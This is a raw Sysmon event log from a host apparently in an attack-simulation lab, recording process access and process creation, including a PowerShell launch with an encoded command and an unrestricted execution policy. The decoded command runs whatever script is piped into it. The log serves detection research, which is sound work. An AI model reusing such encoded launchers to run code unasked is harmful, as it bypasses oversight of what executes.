15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000132Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.669{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.638{D28789B6-7C3C-5FA1-F602-000000008701}4484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\jfxp3ykk.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.623{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\jfxp3ykk.cmdline2020-11-03 15:50:20.623 11241100x8000000000000000129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localDLL2020-11-03 15:50:20.623{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\jfxp3ykk.dll2020-11-03 15:50:20.623 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7C3B-5FA1-F102-000000008701}15444764C:\Windows\system32\conhost.exe{D28789B6-7C3C-5FA1-F502-000000008701}4396C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AC1-5FA1-0500-000000008701}6361160C:\Windows\system32\csrss.exe{D28789B6-7C3C-5FA1-F502-000000008701}4396C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.154{D28789B6-7C3B-5FA1-F402-000000008701}50842316C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C3C-5FA1-F502-000000008701}4396C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+5144f8fb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f0785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f0456|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+513a1abb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508b0fec|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+5090f4bb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f2b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f2b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f29b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508e4936|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f0e69|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f0a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f0785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508f0456|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+513a1abb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508d72b7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+508d6887 154100x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.153{D28789B6-7C3C-5FA1-F502-000000008701}4396C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3B-5FA1-858E-100000000000}0x108e850HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.123{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.123{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.123{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:20.076{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7C3B-5FA1-F402-000000008701}5084C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 